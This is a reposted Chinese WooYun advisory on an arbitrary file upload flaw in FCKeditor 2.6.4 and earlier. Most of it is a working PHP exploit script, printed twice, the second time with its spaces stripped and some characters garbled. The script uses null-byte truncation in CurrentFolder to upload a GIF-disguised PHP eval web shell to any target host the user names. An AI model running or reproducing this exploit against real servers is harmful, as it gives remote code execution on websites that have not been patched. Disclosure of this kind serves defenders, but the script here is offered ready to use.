fckeditor 2.6 php,fckeditor = 2.6.4 任意文件上传漏洞
漏洞概要
缺陷編號:WooYun-2011-01684
漏洞標題:fckeditor <= 2.6.4 任意文件上傳漏洞
相關廠商:fckeditor
漏洞作者:我勒個去
提交時間:2011-03-22 14:09
公開時間:2011-03-22 14:18
漏洞類型:文件上傳導致任意代碼執行
危害等級:高
自評Rank:20
漏洞狀態:未聯系到廠商或者廠商積極忽略
Tags標簽:
漏洞詳情
披露狀態:
2011-03-22: 積極聯系廠商并且等待廠商認領中,細節不對外公開
2011-03-22: 廠商已經主動忽略漏洞,細節向公眾公開
簡要描述:
fckeditor <= 2.6.4 任意文件上傳漏洞, php coldfunsion應該KO了,asp表示很淡定,其他語言版本未測
詳細說明:
currentfolder過濾不給力啊,但是GPC就能讓它腦殘
漏洞證明:
set_time_limit(0);
ini_set("default_socket_timeout", 5);define(STDIN, fopen("php://stdin", "r"));
$match = array();function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
print $resp;
return $resp;
}function connector_response($html)
{
global $match;
return (preg_match("/OnUploadCompleted\((\d),\"(.*)\"\)/", $html, $match) && in_array($match[1], array(0, 201)));
}print "\n+------------------------------------------------------------------+";
print "\n| FCKEditor Servelet Arbitrary File Upload Exploit by Wolegequ |";
print "\n+------------------------------------------------------------------+\n";if ($argc < 3)
{
print "\nUsage......: php $argv[0] host path\n";
print "\nExample....: php $argv[0] localhost /\n";
print "\nExample....: php $argv[0] localhost /FCKEditor/\n";die();
}$host = $argv[1];
$path = ereg_replace("(/){2,}", "/", $argv[2]);$filename = "fvck.gif";
$foldername = "fuck.php%00.gif";
$connector = "editor/filemanager/connectors/php/connector.php";$payload = "-----------------------------265001916915724\r\n";
$payload .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"{$filename}\"\r\n";
$payload .= "Content-Type: image/jpeg\r\n\r\n";
$payload .= 'GIF89a'."\r\n".'<?php eval($_POST[a]) ?>'."\n";
$payload .= "-----------------------------265001916915724--\r\n";$packet = "POST {$path}{$connector}?Command=FileUpload&Type=Image&CurrentFolder=".$foldername." HTTP/1.0\r\n";
//print $packet;
$packet.= "Host: {$host}\r\n";$packet .= "Content-Type: multipart/form-data; boundary=---------------------------265001916915724\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $payload;print $packet;if (!connector_response(http_send($host, $packet))) die("\n[-] Upload failed!\n");
else print "\n[-] Job done! try http://${host}/$match[2] \n";?>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
set_time_limit(0);
ini_set("default_socket_timeout",5);define(STDIN,fopen("php://stdin","r"));
$match=array();functionhttp_send($host,$packet)
{
$sock=fsockopen($host,80);
while(!$sock)
{
print"\n[-] No response from {$host}:80 Trying again...";
$sock=fsockopen($host,80);
}
fputs($sock,$packet);
while(!feof($sock))$resp.=fread($sock,1024);
fclose($sock);
print$resp;
return$resp;
}functionconnector_response($html)
{
global$match;
return(preg_match("/OnUploadCompleted\((\d),\"(.*)\"\)/",$html,$match)&&in_array($match[1],array(0,201)));
}print"\n+------------------------------------------------------------------+";
print"\n| FCKEditor Servelet Arbitrary File Upload Exploit by Wolegequ???? |";
print"\n+------------------------------------------------------------------+\n";if($argc<3)
{
print"\nUsage......: php $argv[0] host path\n";
print"\nExample....: php $argv[0] localhost /\n";
print"\nExample....: php $argv[0] localhost /FCKEditor/\n";die();
}$host=$argv[1];
$path=ereg_replace("(/){2,}","/",$argv[2]);$filename="fvck.gif";
$foldername="fuck.php%00.gif";
$connector="editor/filemanager/connectors/php/connector.php";$payload="-----------------------------265001916915724\r\n";
$payload.="Content-Disposition: form-data; name=\"NewFile\"; filename=\"{$filename}\"\r\n";
$payload.="Content-Type:??image/jpeg\r\n\r\n";
$payload.='GIF89a'."\r\n".'<?phpeval ($_POST[a])?>'."\n";
$payload.="-----------------------------265001916915724--\r\n";$packet="POST {$path}{$connector}?Command=FileUpload&Type=Image&CurrentFolder=".$foldername." HTTP/1.0\r\n";
//print $packet;
$packet.="Host: {$host}\r\n";$packet.="Content-Type: multipart/form-data; boundary=---------------------------265001916915724\r\n";
$packet.="Content-Length: ".strlen($payload)."\r\n";
$packet.="Connection: close\r\n\r\n";
$packet.=$payload;print$packet;if(!connector_response(http_send($host,$packet)))die("\n[-] Upload failed!\n");
elseprint"\n[-] Job done! try http://${host}/$match[2] \n";?>
修復方案:
參見**.**.**.**修復
漏洞回應
廠商回應:
未能聯系到廠商或者廠商積極拒絕
漏洞Rank:12 (WooYun評價)
評價
2010-01-01 00:00 xsser 白帽子 | Rank:152 漏洞數:17)
拜
2010-01-01 00:00 Jacks 白帽子 | Rank:142 漏洞數:25)
這個code怎么那么熟悉?不是EgiX 寫的那個?
2010-01-01 00:00 m0r5 白帽子 | Rank:30 漏洞數:6)
這不是是EgiX 寫的那個?
2010-01-01 00:00 霍家二爺 白帽子 | Rank:63 漏洞數:7)
http://seclists.org/pen-test/2010/Jul/0
截斷呀截斷
2010-01-01 00:00 G8dSnow 白帽子 | Rank:21 漏洞數:5)
截斷各處中招,xss和文件操作都有。。。傷不起。。。
所有媒體,可在保留署名、原文連接的情況下轉載,若非則不得使用我方內容。
關注網絡安全,分享和記錄有趣的資源內容。體驗盒子所發布的一切資源僅限用于學習和研究目的。不得用于非法用途,否則,一切后果請用戶自負。
2006-2019 體驗盒子
×
掃碼分享
驗證:體驗盒子
掃碼分享
×
總結
以上是生活随笔為你收集整理的fckeditor 2.6 php,fckeditor = 2.6.4 任意文件上传漏洞的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: Android开发中,怎样调用摄像机拍照
- 下一篇: QQ资料清空php源码,清除QQ账号所有